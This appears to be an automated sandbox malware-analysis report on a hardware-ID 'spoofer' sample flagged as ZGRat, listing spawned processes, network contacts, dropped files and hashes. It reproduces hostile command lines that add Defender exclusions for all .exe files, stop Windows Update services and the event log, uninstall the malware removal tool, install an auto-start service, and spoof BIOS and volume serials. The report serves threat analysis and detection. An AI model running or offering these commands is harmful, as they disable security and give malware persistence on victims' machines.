"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13743HP-TRGT1522AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613743HP-TRGT1522FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413743HP-TRGT1522FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313743HP-TRGT1522DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713743HP-TRGT1522MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe

"C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13760HP-TRGT22496AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213760HP-TRGT22496RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813760HP-TRGT22496SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513760HP-TRGT22496SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413760HP-TRGT22496FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313760HP-TRGT22496DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713760HP-TRGT22496MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613760HP-TRGT22496FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1619450566910135647-1410053359-1672108338-1974789323748415161-1532368068-438134973"

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "752025126-628002891-590700494-9858222077262813813564437261862708836546748825"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1411383421-1766168883-15612447962851288551989038863279291050881413273399109812"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-855617698-4768896551603069888-8372846494607090741998497141-1585860109-876566517"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-9334595191544904511-1150525792830207160-1622713821172833150018428872-1242952810"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1428107885-11538641226024456031794733802115650022-9071930901732239748-527732463"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "994691572-511111291-1292882474-304860791-1168667435-2060879657353229195201494862"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

Country Destination Domain Proto
US 8.8.8.8:53 bookreading2024.net udp
US 104.21.61.25:443 bookreading2024.net tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
IT 185.196.11.122:80 185.196.11.122 tcp
RU 147.45.44.3:80 147.45.44.3 tcp
RU 147.45.44.3:80 147.45.44.3 tcp

Files

memory/1688-0-0x000007FEF5D53000-0x000007FEF5D54000-memory.dmp

memory/1688-1-0x00000000008E0000-0x000000000090C000-memory.dmp

memory/1688-2-0x00000000001D0000-0x00000000001D6000-memory.dmp

memory/1688-3-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

memory/1688-4-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

memory/1932-9-0x0000000002E10000-0x0000000002E90000-memory.dmp

memory/1932-10-0x000000001B800000-0x000000001BAE2000-memory.dmp

memory/1932-11-0x00000000027E0000-0x00000000027E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab39F6.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar3A47.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 76ab4183ad730e1bfa621f0842216ad7
SHA1 6f4edcb119d368fd0659fc00e505bb25e4602cd9
SHA256 955f5b01db5131821b47cbe29654a74547b7b327ab1f564991c5fe2d679718d7
SHA512 43c0f45bdfb5668e8960c3d8556b47cb71691cad87f022e2cd36ada2f239de77d7fa88d30c1e1ec9b871e45a6b53528f8e46d2ade704f43d6143a7c168b4edb9

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

MD5 280f228a0fd9232c72c66646f5ac8f27
SHA1 f6ed9a02fe24afa92b832efb95d4c140f1f9855a
SHA256 6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51
SHA512 5e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e

C:\Users\Admin\AppData\Roaming\conhostsft.exe

MD5 975eca3793d5ec51d4bd4041fe4bd595
SHA1 f3b36aad3566d36a81cb8ab11c49e28b8fbb807e
SHA256 50a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3
SHA512 af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89

\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 81a45f1a91448313b76d2e6d5308aa7a
SHA1 0d615343d5de03da03bce52e11b233093b404083
SHA256 fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe

MD5 bb93bfa99237b0efc8e476af92d2882c
SHA1 aa3285a0166dc7efe30a9156ea0d98af9f83651a
SHA256 92820ca93b03d8c98ffeee165a92b6fa536abd34c97bb692b51e70f6f74dbeb0
SHA512 40d8867fe2335315bd8de9da2571a0ba22e7760e5a6a9743a3aa611113406c0e4fc7f5b25986a18e58feb3e7e510923dc6320ae44fdce9ea02a467b3cab6ac70

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

\ProgramData\Microsoft\Windows\DevManView.exe

MD5 33d7a84f8ef67fd005f37142232ae97e
SHA1 1f560717d8038221c9b161716affb7cd6b14056e
SHA256 a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512 c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

C:\ProgramData\Microsoft\Windows\DevManView.cfg

MD5 43b37d0f48bad1537a4de59ffda50ffe
SHA1 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256 fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512 cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat

MD5 62a4289ada4d67fedd4d54ba96b5b228
SHA1 c60573ddfd05111be1adf47d28cd04ecadd5eaef
SHA256 6c4f31567a23e66fb38e0d495d8a0c2d4284d03ce58d3a45e7964a3f68035d50
SHA512 d609dd9179a243fe2f89559276bd424490045e80d112f63c63b20271f1f63c0ad2d89bf256e2c0dfba29c37e2ba34bb7067e02388aa1490e22fc13660473d64a

\ChainReview\sphyperRuntimedhcpSvc.exe

MD5 93457a02f578affc1800d7528c5370f3
SHA1 fc79e5088c9df79bcd8e53d0b95661c3b5396806
SHA256 ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5
SHA512 4c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e

memory/2400-170-0x0000000000E50000-0x0000000001054000-memory.dmp

memory/2400-172-0x0000000000320000-0x000000000032E000-memory.dmp

memory/2400-174-0x0000000000350000-0x000000000036C000-memory.dmp

memory/2400-176-0x0000000000370000-0x0000000000388000-memory.dmp

memory/2400-178-0x0000000000330000-0x000000000033E000-memory.dmp

memory/2400-180-0x0000000000340000-0x000000000034E000-memory.dmp

memory/2400-182-0x0000000000390000-0x000000000039C000-memory.dmp

memory/2400-184-0x00000000003A0000-0x00000000003AE000-memory.dmp

memory/2400-186-0x00000000003B0000-0x00000000003BC000-memory.dmp

\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\amifldrv64.sys

MD5 785045f8b25cd2e937ddc6b09debe01a
SHA1 029c678674f482ababe8bbfdb93152392457109d
SHA256 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA512 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat

MD5 2afefd7019f68a7b569ded0c589fb38c
SHA1 038fd77cc2b500dff389804cf0a33b247e1c0966
SHA256 3c2c1720929d8b111f8d33b90254c56da89f3e51eb90f7a545788589a15e6558
SHA512 48d6c47564e9077f504428c4dfc5f61e9af598f9de2e130b4cf0c70a8ae8fd2dbde6c850812d6a288f6630cda21836c76e4b12f53815f4649ab36e3079f3389a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d46d7ee41c46eb4f295e6dd8580fafe1
SHA1 9af016e270ffc9b2a06658b1e83b1a490af22bcf
SHA256 a5c97aac08de239ff256c0956aa339d72f6f649af463303dcce9270bdd7b72a2
SHA512 1d2663cba818c0e1bd56a6ad34d6eabab0181882411ae9b4920f25b0551b399a49e1fe356a2e76b1dd0cc22b1b4ea423276f096fb2b4fc810bf15b975d3597a7

memory/776-221-0x000000001B630000-0x000000001B912000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f8e15ec4215586e1bc45ab326d416ff7
SHA1 01b9e2b5e183e35e87cc4004d368223bd121a319
SHA256 322fbd8ea8dfe511a367f0bbcf9092ad56bbdfb41ea71fe7ca4d0ec9508695f8
SHA512 2ab103dbcb21abcec389d2ba8e5d35d3fec108dfd28e6b07f4a7112de646615c38a365cd4209ac5661025c0174ad5d0834e6ec030487efd25e0422d8b0e35b6e

memory/776-222-0x0000000002710000-0x0000000002718000-memory.dmp

memory/2208-255-0x00000000012B0000-0x00000000014B4000-memory.dmp

memory/1208-256-0x00000000026E0000-0x00000000026E8000-memory.dmp

memory/604-267-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-269-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-273-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-271-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-270-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-268-0x0000000140000000-0x000000014000E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 01:19

Reported

2024-05-09 01:22

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
